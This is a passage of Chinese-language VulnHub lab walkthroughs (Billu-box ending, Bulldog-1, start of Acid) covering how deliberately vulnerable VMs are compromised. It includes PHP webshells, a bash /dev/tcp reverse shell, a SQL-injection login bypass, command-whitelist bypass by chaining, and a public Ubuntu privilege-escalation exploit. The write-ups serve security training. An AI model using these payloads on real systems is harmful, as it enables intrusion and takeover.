</p><p>虛機從新安裝後，ssh登陸，查看mysql運行狀態正常，可是新虛機的IP變成：192.168.64.162。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/24.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步驟10：回到步驟6，經過獲得的mysql密碼登陸phpmyadmin</li></ul><p>用戶名：billu，密碼：b0x_billu，登陸成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/25.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>在<code>ica_lab</code>數據庫的auth表中，找到web登陸的用戶名：biLLu，密碼：hEx_it。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/26.jpg' alt='' referrerPolicy='no-referrer' /> </p><h2><a name='header-n7650' class='md-header-anchor '></a>獲取shell</h2><ul><li>步驟11：登陸index首頁，並得到cmd shell和反彈shell</li></ul><p>(1) 使用web密碼登陸首頁，大小寫必須同樣。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登陸後是帳號管理界面，帳號是加勒比海盜的兩位主角船長：傑克·斯帕羅和巴博薩船長。多寫一句，本人更喜歡巴博薩船長，一個像敵人同樣的海盜朋友，幽默、勇敢、陰險狡詐、霸道野心、老謀深算。</p><p>兩個帳號的頭像圖片地址，在以前暴破出來：<code>http://192.168.64.162/uploaded_images/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 點擊add user進入添加帳號界面，這是一個圖片上傳，思路是利用圖片上傳和文件包含得到shell。</p><p>查看以前test文件包含得到的panel.php源碼，發現panel.php存在本地文件包含漏洞：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>下載一張<code>http://192.168.64.162/uploaded_images/</code>中的圖片jack.php，文本編輯器打開，在文件中間或末尾加入一句話cmd命令馬<code><?php system($_GET['cmd']); ?></code> 將文件上傳成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 使用burp執行命令：
post請求url中加入執行命令的參數：<code>POST /panel.php?cmd=cat%20/etc/passwd;ls</code></p><p>post的body中包含cmd.jpg圖片馬：<code>load=/uploaded_images/cmd.jpg&continue=continue</code></p><p>成功執行命令<code>cat /etc/passwd;ls</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 用bash反彈shell</p><p>命令：echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash</p><p>須要將命令url編碼：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在post的url中發送命令：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc接收反彈shell成功：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟12：找一個可寫權限目錄，寫入菜刀馬</li></ul><p>文件上傳目錄uploaded_images爲寫權限目錄，進入該目錄，寫一個菜刀馬：<code>echo '<?php eval($_POST['123456']);?>' >> caidao.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>菜刀鏈接成功，方便傳文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7712' class='md-header-anchor '></a>提高權限</h2><ul><li>步驟13：查看內核、系統版本，尋找提權exp</li></ul><p>(1) 查看系統內核版本，命令<code>uanme -a</code>和<code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 下載Ubuntu著名的本地提權漏洞exp：</p><p><code>https://www.exploit-db.com/exploits/37292/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟14：編譯、提權</li></ul><p>(1) 賦予執行權限 </p><p><code>chmod 777 37292.c</code></p><p>(2) 編譯exp</p><p><code>gcc 37292.c -o exp</code></p><p>(3) 執行exp，提權至root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7744' class='md-header-anchor '></a>思路總結</h2><h3><a name='header-n7746' class='md-header-anchor '></a>其餘滲透思路</h3><p>正常的思路有3條路線能夠突破。</p><p>思路1：構造注入：從test的文件包含得到index.php源碼，源碼中可查看到過濾sql的方法，針對性構造sql注入，登陸後獲取shell再提權。</p><p>(1) 審計index.php源碼，發現如下過濾規則：</p><p><code>$uname=str_replace('\'','',urldecode($_POST['un']));</code></p><p><code>$pass=str_replace('\'','',urldecode($_POST['ps']));</code></p><p>str_replace的做用是將字符串\' 替換爲空，所以構造SQL注入登陸payload時，必須含有\'字符串，不然會報錯。urldecode的做用是將輸入解碼。</p><p>(2) 常見的利用注入登陸的payload是' or 1=1 -- 修改這個在最後增長\'，str_replace會將這個\'替換爲空。</p><p>使用php在線調試工具，測試以下：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 注入成功，payload是' or 1=1 -- \'</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p>後面獲取shell方法和上面實驗相同。</p><p>思路2：暴破出phpmyadmin，文件包含從c.php得到mysql密碼，登陸phpmyadmin，再獲取shell。</p><p>思路3：文件包含全部有權限查看的配置文件，從phpmyadmin配置文件得到root密碼，而後ssh登陸。該過程儘管mysql故障，也能夠完成。</p><ul><li>踩到的坑</li></ul><p>(1) mysql被高線程目錄暴破和注入宕機：致使phpmyadmin有正確密碼但沒法登陸，耗費較長時間。這是意外故障。由於以前的2個工具同時目錄暴破、sqlmap注入等線程太高，致使mysql死了。</p><p>(2) test.php文件包含漏洞利用，get不行，改成post試試。包含成功後，要把各個頁面的源代碼拿下來審計。</p><p>(3) index.php的SQL注入花費很多時間，後來發現，即便不用sql注入，也有其餘道路能夠完成，經過phpmyadmin登陸，繞過了注入。</p><p>(4) panel.php的文件包含漏洞，若是不認真關注源碼，難以發現。使用test.php的文件包含，沒能觸發shell利用。</p><p>(5) 文件上傳+文件包含拿shell是靶機經常使用的方式，遇到兩個漏洞，能夠熟練拿shell。</p><p>(6) 提權方法能夠多關注主要的配置文件、數據庫鏈接文件、用戶的文件；也能夠利用Ubuntu已知漏洞本地提權。</p><h1><a name='header-n7794' class='md-header-anchor '></a>第三節 bulldog-1</h1><h2><a name='header-n7795' class='md-header-anchor '></a>靶機信息</h2><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">做者：紅日安全</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">首發安全客：https://www.anquanke.com/post/id/106459</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h3><a name='header-n7797' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/bulldog/bulldog.ova' target='_blank' class='url'>https://download.vulnhub.com/bulldog/bulldog.ova</a></p><h3><a name='header-n7800' class='md-header-anchor '></a>靶機說明</h3><p>牛頭犬行業最近的網站被惡意的德國牧羊犬黑客破壞。這是否意味着有更多漏洞能夠利用？你爲何找不到呢？：）</p><p>這是標準的Boot-to-Root,目標是進入root目錄並看到祝賀消息。</p><h3><a name='header-n7805' class='md-header-anchor '></a>目標</h3><p>得到root權限和flag。</p><h3><a name='header-n7808' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機：用VirtualBox啓動虛機，導入鏡像，網絡鏈接方式設置爲橋接到無線網卡。靶機啓動後，自動得到IP：172.20.10.7。</li><li>Windows攻擊機：物理機，鏈接無線網卡，自動獲取IP：172.20.10.5，安裝有Burpsuit、nc、Python2.七、DirBuster等滲透工具。</li><li>Kali攻擊機：VMWare啓動虛機，橋接到無線網卡，自動獲取IP：172.20.10.6。攻擊機二選一便可。</li></ul><h2><a name='header-n7819' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>靶機啓動後，自動得到IP，而且顯示在啓動完成後的界面，IP爲：172.20.10.7。無需使用Nmap掃描C段發現IP。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口和服務識別</li></ul><p>使用nmap掃描1-65535全端口，並作服務指紋識別，掃描結果保存到txt文件，命令：</p><p><code>nmap -p1-65535 -A 172.20.10.7 -oN bulldog.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>發現目標主機端口和服務以下：</p><p>端口         協議        後端服務</p><p>TCP 23      SSH        open-ssl 7.2p2</p><p>TCP 80      HTTP       WSGIServer Python 2.7.12     <br/></p><p>TCP 8080    HTTP       WSGIServer Python 2.7.12</p><p>操做系統：Linux 3.2-4.9</p><h2><a name='header-n7850' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>web漏洞思路：</li></ul><p>(1) 查看每一個網頁的源碼，看是否有提示；</p><p>(2) 暴破目錄，用DirBuster，看是否有新網頁，找新網頁的漏洞；</p><p>(3) 找注入或框架漏洞：若是網頁有輸入框、URL參數，可AWVS掃描注入；若是web使用了某些CMS框架，只能找框架的通用漏洞，一般掃描不到注入。</p><ul><li>ssh利用思路：</li></ul><p>(1) 如獲得用戶名，能夠用就九頭蛇或美杜莎暴破弱口令，但須要強大的字典且有弱口令。</p><p>(2) 若是獲得web管理或系統帳號，能夠嘗試鏈接ssh，如能鏈接上，無需反彈shell了。</p><ul><li>步驟1：瀏覽網頁，暴破目錄</li></ul><p>(1) 訪問 <code>http://172.20.10.7/</code> 進入首頁：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><p>首頁有連接，點擊進入notice頁面，未發現有價值的信息。</p><p>(2) 使用DirBuster暴破目錄，獲得dev和admin目錄：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 訪問<code>http://172.20.10.7/admin</code>，這是一個Django管理後臺，須要用戶名、密碼登陸，試了下沒有常見弱口令，先不嘗試暴破，去看看其餘頁面。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) 訪問<code>http://172.20.10.7/dev</code>，該頁面的有價值信息很是多，主要信息：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><p>新系統不在使用php或任何CMS，而是使用Django框架開發。這意味着不太可能再找到網頁的注入漏洞，只能找Django框架漏洞；網站不使用php，無需再找php漏洞或者寫php木馬；</p><p>新系統使用webshell管理，有一個Web-shell連接，點擊可訪問<code>http://172.20.10.7/dev/shell/</code>,可是須要認證。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟2：破解hash</li></ul><p>(1) 查看<code>http://172.20.10.7/dev</code>頁面源碼，會發現有每一個Team Lead的郵箱和hash:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>而且有明顯的英文提示：We'll remove these in prod. It's not like a hacker can do anything with a hash。</p><p>(2) hash長度爲40位，能夠看出是sha1，即便不知道是哪一種hash，也能夠把每一個hash值，到CMD5嘗試碰撞解密：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 最終解密出2個hash值：</p><p>Back End: <a href='mailto:nick@bulldogindustries.com' target='_blank' class='url'>nick@bulldogindustries.com</a></p><p>用戶名：nick，密碼：bulldog （CMD5可免費解密出來）</p><p>Database: <a href='mailto:sarah@bulldogindustries.com' target='_blank' class='url'>sarah@bulldogindustries.com</a></p><p>用戶名：sarah，密碼：bulldoglover （CMD5須要收費解密出來）</p><ul><li>步驟3：登陸後臺</li></ul><p>(1) 使用解密出來的密碼嘗試登陸掃描出來的23端口ssh都失敗：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) 使用sarah、密碼bulldoglover成功登陸管理後臺，發現沒有編輯權限。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 再去訪問webshell頁面，已經過認證，可執行命令，這是一個命令執行界面：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7938' class='md-header-anchor '></a>獲取shell</h2><ul><li>步驟4：繞過白名單限制，執行系統命令： </li></ul><p>webshell頁面只能執行白名單的命令，嘗試用；或者&&鏈接，執行多個命令：</p><p>ls是白名單命令，id是禁止命令，經過<code>ls && id</code>可成功執行id命令，達到繞過白名單限制執行命令。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟5：反彈shell： </li></ul><p>(1) Windows攻擊機開啓nc監聽：<code>nc -lvnp 4444</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) 直接執行<code>ls && bash -i >& /dev/tcp/172.20.10.5/4444 0>&1</code>失敗，server報錯500。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 嘗試屢次bash反彈，最後使用echo命令先輸出命令，再輸入到bash，反彈shell成功：</p><p><code>echo "bash -i >& /dev/tcp/172.20.10.5/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7969' class='md-header-anchor '></a>提高權限</h2><ul><li>步驟6：查看有哪些系統用戶 <code>cat /etc/passwd</code>, 發現須要關注的用戶有：bulldogadmin、django</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/17.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟7：查找每一個用戶的文件（不顯示錯誤） <code>find / -user bulldogadmin 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/18.png' alt='' referrerPolicy='no-referrer' /></p><p>(1) 發現值得關注的文件有：一個是note，一個是customPermissionApp。</p><p>/home/bulldogadmin/.hiddenadmindirectory/note</p><p>/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</p><p>(2) 打開note文本文件：發現提示webserver有時須要root權限訪問。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 打開customPermissionApp，看上去是可執行文件，使用strings打印其中的可打印字符：</p><p><code>strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/20.png' alt='' referrerPolicy='no-referrer' /></p><p>note文件中提示執行該文件，能夠得到root權限，但經過ls查看文件權限只有讀權限，並沒有法執行。</p><ul><li>步驟8：拼接root密碼提權</li></ul><p>(1) 觀察文件中只有這些字符，疑似可能與密碼相關，英文單詞包括：SUPER、 ulitimate、PASSWORD、youCANTget，這些都與最高權限帳號相關，推測這是一個解謎題目：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>最直接的組合是去掉H，變成一句通順的英文句子：SUPERultimatePASSWORDyouCANTget</p><p>(2) su命令沒法執行，提示：must be run from a terminal，上次Vulhub已經遇到過該問題，經過一句Python解決：</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>(3) 執行<code>sudo su -</code>，得到root權限，獲取flag：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) 若是不解決沒法su，還記得有23端口的ssh，也可使用Xshell經過ssh登陸，登陸成功後執行sudo su - 提權並得到flag</p><p>用戶名：<code>django</code></p><p>密碼：<code>SUPERultimatePASSWORDyouCANTget</code>   不用猜想的密碼，改了django再登陸也能夠。</p><p>sudo su提權，密碼是：<code>SUPERultimatePASSWORDyouCANTget</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n8033' class='md-header-anchor '></a>靶場思路回顧</h2><p>1.目錄暴破出dev和admin頁面：</p><p>(1) 可暴破出dev頁面，該頁面源碼裏面有多個帳號的用戶名、郵箱、密碼sha1值。該頁面還連接到webshell命令執行頁面。</p><p>(2) 可暴破出admin後臺頁面，登陸密碼經過dev頁面破解sha1獲得。</p><p>2.繞過白名單限制，執行命令和反彈shell：繞過限制執行命令比較容易。反彈shell嘗試屢次使用bash反彈shell後成功，沒有嘗試py shell。</p><p>3.搜索系統中id爲1000之後的用戶的文件，能夠找到隱藏文件。</p><p>4.猜解root密碼很艱難。</p><h2><a name='header-n8046' class='md-header-anchor '></a>思路總結</h2><h3><a name='header-n8047' class='md-header-anchor '></a>難點和踩到的坑</h3><p>(1) 發現和破解sha1：在dev頁面查看源碼，發現多個用戶hash後，即便不知道是40位的sha1，也能夠直接去cmd5破解，系統會自動識別，能夠破解出2個帳號。若是用hashcat暴破sha1，須要強大的字段和較長的時間。</p><p>(2) 反彈shell應該有多種方法：第一個想到的是bash shell，也想到了python反彈shell。只嘗試了經過bash反彈shell，若是bash反彈不成功，可嘗試往系統echo文件，賦予+x執行權限，執行腳本反彈。也可嘗試Python是否可以反彈shell。</p><p>(3) 發現隱藏的包含root密碼的文件，經過搜索id爲1000以後的用戶文件，查看歷史命令，或者查看目錄，也可能找到。</p><p>(4) 猜解root密碼：這個是最難的，找到這個文件並不難，可是經過strings查看文件內容，而且拼接字符串爲root密碼，感受難度很大。</p><h1><a name='header-n8056' class='md-header-anchor '></a>第四節 Acid</h1><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">做者：紅日安全</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">首發安全客：https://www.anquanke.com/post/id/10546</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h2><a name='header-n8058' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n8059' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/acid/Acid.rar' target='_blank' class='url'>https://download.vulnhub.com/acid/Acid.rar</a></p><h3><a name='header-n8062' class='md-header-anchor '></a>靶機說明</h3><p>Welcome to the world of Acid.
Fairy tails uses secret keys to open the magical doors.</p><p>歡迎來到Acid的世界。童話故事須要使用祕密鑰匙打開魔法門。</p><h3><a name='header-n8068' class='md-header-anchor '></a>目標</h3><p>得到root權限和flag。</p><h3><a name='header-n8071' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機配置：該虛擬機徹底基於Web，提取rar並使用VMplayer運行vmx，網絡鏈接方式設置爲net，靶機自動獲取IP。</li><li>攻擊機配置：同網段下有Windows攻擊機，安裝有Burpsuit、nc、Python2.七、DirBuster、御劍等滲透工具。</li><li></li></ul><h2><a name='header-n8082' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>啓用Acid虛擬機，因爲網絡設置爲net模式，使用Nmap掃描VMware Network Adapter VMnet8網卡的NAT網段，便可找到虛機IP，掃描結果保存到txt文件，命令：</p><p><code>nmap -sP 192.168.64.0/24 -oN acid-ip.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><p>得到目標ip <code>192.168.64.153</code></p><ul><li>端口掃描</li></ul><p>使用nmap掃描1-65535全端口，並作服務指紋識別，掃描結果保存到txt文件，命令：</p><p><code>nmap -p1-65535 -sV -oN acid-port.txt 192.168.64.153</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>目標主機的33447端口發現web服務，web服務器是Apache2.4.10，操做系統ubuntu。</p><p><code>http://192.168.64.153:33447</code> 進入主頁：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>服務識別</li></ul><p>只發現web服務和Apache，只能從web漏洞或者Apache漏洞入手（若有漏洞）：</p><p>端口：Tcp 33447</p><p>底層服務：Apache2.4.10</p><p>操做系統：Ubuntu</p><h2><a name='header-n8124' class='md-header-anchor '></a>漏洞挖掘的詳細思路</h2><ul><li>web挖掘思路：</li></ul><p>(1) 查看每一個網頁的源碼，看是否有提示；</p><p>(2) 暴破目錄，用御劍或DirBuster，看是否有新網頁，找新網頁的漏洞；</p><ul><li>Apache挖掘思路：</li></ul><p>(1) 尋找Apache2.4.10有無已知漏洞可利用：沒有發現可直接利用的漏洞。</p><p>(2) 到<a href='http://www.exploit-db.com' target='_blank' class='url'>www.exploit-db.com</a>查詢有無exp：沒有找到exp。</p><p>(3) Nessus掃描一下主機漏洞：沒有掃描出漏洞。</p><ul><li>實在找不到漏洞：單用戶模式進入Ubuntu，看源碼吧。</li></ul><ul><li>步驟1：首先看主頁源碼，發現提示：0x643239334c6d70775a773d3d</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>0x是16進制編碼，將值643239334c6d70775a773d3d進行ASCII hex轉碼，變成：d293LmpwZw==</p><p>發現是base64編碼，再進行解碼，獲得圖片信息 wow.jpg</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>這時能夠根據經驗在首頁直接加目錄打：/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 網站的圖片目錄一般是這樣命名。也能夠利用dirbuster進行目錄爆破，獲得圖片目錄images。</p><ul><li>訪問 <code>http://192.168.64.153:33447/images/wow.jpg</code> 獲得圖片：</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>將圖片保存到本地，用Notepad++打開，發現最下邊有提示</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><p>將3761656530663664353838656439393035656533376631366137633631306434進行ASCII hex轉碼，獲得 7aee0f6d588ed9905ee37f16a7c610d4，這是一串md5。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>去cmd5解密，獲得63425，推測是一個密碼或者ID。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟2：使用Dirbuster進行目錄暴破：</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>查看暴破結果：發現challenge目錄，該目錄下有cake.php、include.php、hacked.php，用Burpsuit掛上代理，使用Firefox而後依次訪問3個文件：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟3：訪問cake.php，發現須要登陸後才能訪問：</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><p>該頁面若是看頁面title或者看burpsuit的Response返回值的<title>/Magic_Box</title>，會發現有/Magic_Box目錄存在，先看其餘頁面。</p><p>點擊login會跳轉到index.php登陸頁面，須要email和密碼才能登陸：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟4：訪問include.php，這是一個文件包含漏洞頁面：</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>在輸入框中輸入 /etc/passwd 測試存在文件包含，Burpsuit顯示response包以下：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>想文件包含拿shell，但沒有文件上傳點，以前發現的wow.jpg中無木馬可包含。先繼續看hacked.php。</p><ul><li>步驟5：訪問cake.php，須要輸入ID，測試下以前從wow.jpg解密出來的數字：63425</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><p>而後，什麼也沒有發生，看來ID不對，或者須要先經過index頁面輸入email和密碼登陸。</p><ul><li>步驟6：找注入，把發現的幾個頁面都送入AWVS掃描了漏洞，未發現注入。</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/17.png' alt='' referrerPolicy='no-referrer' 